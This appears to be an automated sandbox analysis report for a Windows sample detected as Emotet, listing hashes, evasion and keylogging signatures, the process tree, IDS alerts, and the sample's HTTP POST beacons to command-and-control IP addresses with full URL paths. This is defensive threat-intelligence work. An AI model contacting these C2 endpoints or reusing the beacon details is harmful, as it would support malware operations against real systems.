Play interactive tour

Edit tour

Analysis Report WZ1j9bqSlV

Overview

General Information

Sample Name:	WZ1j9bqSlV (renamed file extension from none to exe)
Analysis ID:	317623
MD5:	e320c9dcc1512107fc6bc5e8b71d27d3
SHA1:	171b4e36060d479c7e052d737cb7d1148f1c2613
SHA256:	f2c455143ba76694ed0d1d2c33add8d98601892b6707f41d289af96e2bd3e6fb
Most interesting Screenshot:

Detection

Emotet

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Emotet

Changes security center settings (notifications, updates, antivirus, firewall)

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to enumerate running services

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files to the windows directory (C:\Windows)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains strange resources

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Tries to load missing DLLs

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

WZ1j9bqSlV.exe (PID: 3220 cmdline: 'C:\Users\user\Desktop\WZ1j9bqSlV.exe' MD5: E320C9DCC1512107FC6BC5E8B71D27D3)

unlodctr.exe (PID: 2920 cmdline: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe MD5: E320C9DCC1512107FC6BC5E8B71D27D3)

svchost.exe (PID: 5380 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 2964 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6172 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6248 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6332 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 6388 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 6420 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 5316 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 3000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6512 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000001.00000002.498518056.0000000002251000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.498493339.0000000002234000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.236225902.0000000002231000.00000020.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.236214362.0000000002220000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000001.00000002.498077947.0000000000780000.00000040.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
00000000.00000002.236259963.0000000002314000.00000004.00000001.sdmp	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.WZ1j9bqSlV.exe.2230000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security
1.2.unlodctr.exe.2250000.1.unpack	JoeSecurity_Emotet	Yara detected Emotet	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: WZ1j9bqSlV.exe	Virustotal: Detection: 52%	Perma Link
Source: WZ1j9bqSlV.exe	Metadefender: Detection: 40%	Perma Link
Source: WZ1j9bqSlV.exe	ReversingLabs: Detection: 58%
Source: WZ1j9bqSlV.exe	Virustotal: Detection: 52%	Perma Link
Source: WZ1j9bqSlV.exe	Metadefender: Detection: 40%	Perma Link
Source: WZ1j9bqSlV.exe	ReversingLabs: Detection: 58%

Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252330 CryptGetHashParam,CryptExportKey,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252010 memcpy,CryptDestroyHash,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDecrypt,CryptVerifySignatureW,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252330 CryptGetHashParam,CryptExportKey,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDestroyHash,CryptEncrypt,memcpy,GetProcessHeap,HeapFree,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252730 CryptAcquireContextW,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx,CryptGenKey,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252010 memcpy,CryptDestroyHash,CryptDuplicateHash,GetProcessHeap,RtlAllocateHeap,CryptDecrypt,CryptVerifySignatureW,GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0042860E __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004328E6 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02233A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_0042860E __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_004328E6 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\WZ1j9bqSlV.exe	Code function: 0_2_02233A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_0042860E __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_004328E6 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02253A10 _snwprintf,FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,FindClose,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.5:49718 -> 27.78.27.110:443
Source: Traffic	Snort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.2.5:49727 -> 81.241.22.161:20
Source: Traffic	Snort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.5:49736 -> 91.121.200.35:8080
Source: Traffic	Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.5:49718 -> 27.78.27.110:443
Source: Traffic	Snort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.2.5:49727 -> 81.241.22.161:20
Source: Traffic	Snort IDS: 2404346 ET CNC Feodo Tracker Reported CnC Server TCP group 24 192.168.2.5:49736 -> 91.121.200.35:8080

Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 81.241.22.161:20
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 91.121.200.35:8080
Source: global traffic	TCP traffic: 192.168.2.5:49727 -> 81.241.22.161:20
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 91.121.200.35:8080

Source: Joe Sandbox View	IP Address: 91.121.200.35 91.121.200.35
Source: Joe Sandbox View	IP Address: 91.121.200.35 91.121.200.35

Source: Joe Sandbox View	ASN Name: VIETEL-AS-APViettelGroupVN VIETEL-AS-APViettelGroupVN
Source: Joe Sandbox View	ASN Name: VIETEL-AS-APViettelGroupVN VIETEL-AS-APViettelGroupVN
Source: Joe Sandbox View	ASN Name: PROXIMUS-ISP-ASBE PROXIMUS-ISP-ASBE
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 27.78.27.110:443
Source: global traffic	TCP traffic: 192.168.2.5:49718 -> 27.78.27.110:443

Source: global traffic	HTTP traffic detected: POST /dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.200.35/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------gutwwocMdR0JwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.121.200.35:8080Content-Length: 4564Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.200.35/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------gutwwocMdR0JwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.121.200.35:8080Content-Length: 4564Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 27.78.27.110
Source: unknown	TCP traffic detected without corresponding DNS query: 27.78.27.110
Source: unknown	TCP traffic detected without corresponding DNS query: 27.78.27.110
Source: unknown	TCP traffic detected without corresponding DNS query: 81.241.22.161
Source: unknown	TCP traffic detected without corresponding DNS query: 81.241.22.161
Source: unknown	TCP traffic detected without corresponding DNS query: 81.241.22.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 27.78.27.110
Source: unknown	TCP traffic detected without corresponding DNS query: 27.78.27.110
Source: unknown	TCP traffic detected without corresponding DNS query: 27.78.27.110
Source: unknown	TCP traffic detected without corresponding DNS query: 81.241.22.161
Source: unknown	TCP traffic detected without corresponding DNS query: 81.241.22.161
Source: unknown	TCP traffic detected without corresponding DNS query: 81.241.22.161
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35
Source: unknown	TCP traffic detected without corresponding DNS query: 91.121.200.35

Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252A80 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,
Source: C:\Windows\SysWOW64\NetCfgNotifyObjectHost\unlodctr.exe	Code function: 1_2_02252A80 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW,

Source: unknown	HTTP traffic detected: POST /dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.200.35/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------gutwwocMdR0JwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.121.200.35:8080Content-Length: 4564Cache-Control: no-cache
Source: unknown	HTTP traffic detected: POST /dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 91.121.200.35/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-------------gutwwocMdR0JwUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 91.121.200.35:8080Content-Length: 4564Cache-Control: no-cache

Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://27.78.27.110:443/gy1rDFFGDGn1U/LzMTsGmA7K7RtJX/lsng6PZCgl3MlTI6Z/GenKfTjtUAV1UAC/
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://27.78.27.110:443/gy1rDFFGDGn1U/LzMTsGmA7K7RtJX/lsng6PZCgl3MlTI6Z/GenKfTjtUAV1UAC/77)
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp, unlodctr.exe, 00000001.00000003.375609039.0000000002A11000.00000004.00000001.sdmp, unlodctr.exe, 00000001.00000002.498179084.00000000007DA000.00000004.00000020.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/
Source: unlodctr.exe, 00000001.00000002.498179084.00000000007DA000.00000004.00000020.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/a
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/em32
Source: unlodctr.exe, 00000001.00000002.498179084.00000000007DA000.00000004.00000020.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/n
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://91.121.200.35:8080/dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/
Source: unlodctr.exe, 00000001.00000002.498767993.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: http://91.121.200.35:8080/dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/%
Source: unlodctr.exe, 00000001.00000002.498767993.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: http://91.121.200.35:8080/dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/u
Source: svchost.exe, 00000002.00000002.499478784.0000021D13414000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000002.00000002.499478784.0000021D13414000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000002.00000002.499478784.0000021D13414000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000002.00000002.499728768.0000021D13630000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000007.00000002.306458625.0000019634013000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000003.306126697.0000019634049000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000002.306497289.0000019634052000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000007.00000003.306152917.0000019634040000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000007.00000003.306152917.0000019634040000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000003.306152917.0000019634040000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.306531931.000001963405C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000007.00000003.306126697.0000019634049000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000002.306531931.000001963405C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000002.306531931.000001963405C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000002.306497289.0000019634052000.00000004.00000001.sdmp, svchost.exe, 00000007.00000003.306126697.0000019634049000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.283845753.0000019634031000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 00000007.00000002.306458625.0000019634013000.00000004.00000001.sdmp, svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 00000007.00000003.306145388.0000019634045000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000007.00000003.306145388.0000019634045000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000007.00000003.283845753.0000019634031000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 00000007.00000002.306481032.000001963403A000.00000004.00000001.sdmp	String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 00000007.00000002.306497289.0000019634052000.00000004.00000001.sdmp	String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://27.78.27.110:443/gy1rDFFGDGn1U/LzMTsGmA7K7RtJX/lsng6PZCgl3MlTI6Z/GenKfTjtUAV1UAC/
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://27.78.27.110:443/gy1rDFFGDGn1U/LzMTsGmA7K7RtJX/lsng6PZCgl3MlTI6Z/GenKfTjtUAV1UAC/77)
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp, unlodctr.exe, 00000001.00000003.375609039.0000000002A11000.00000004.00000001.sdmp, unlodctr.exe, 00000001.00000002.498179084.00000000007DA000.00000004.00000020.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/
Source: unlodctr.exe, 00000001.00000002.498179084.00000000007DA000.00000004.00000020.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/a
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/em32
Source: unlodctr.exe, 00000001.00000002.498179084.00000000007DA000.00000004.00000020.sdmp	String found in binary or memory: http://81.241.22.161:20/Igbzc/hxbKn/n
Source: unlodctr.exe, 00000001.00000002.500181787.0000000002A00000.00000004.00000001.sdmp	String found in binary or memory: http://91.121.200.35:8080/dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/
Source: unlodctr.exe, 00000001.00000002.498767993.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: http://91.121.200.35:8080/dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/%
Source: unlodctr.exe, 00000001.00000002.498767993.0000000002484000.00000004.00000001.sdmp	String found in binary or memory: http://91.121.200.35:8080/dj9ZibfO3/1NNVyM47rh3S61LsG96/xa4elho/w8zZgooXX/u
Source: svchost.exe, 00000002.00000002.499478784.0000021D13414000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: svchost.exe, 00000002.00000002.499478784.0000021D13414000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000002.00000002.499478784.0000021D13414000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000002.00000002.499728768.0000021D13630000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: svchost.exe, 00000007.00000002.306458625.0000019634013000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000005.00000002.497716730.00000205F8043000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000003.306126697.0000019634049000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000007.00000002.306497289.0000019634052000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000007.00000002.306485018.000001963403D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000007.00000003.306115795.000001963405F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000007.00000003.306152917.0000019634040000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000007.00000003.306152917.0000019634040000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
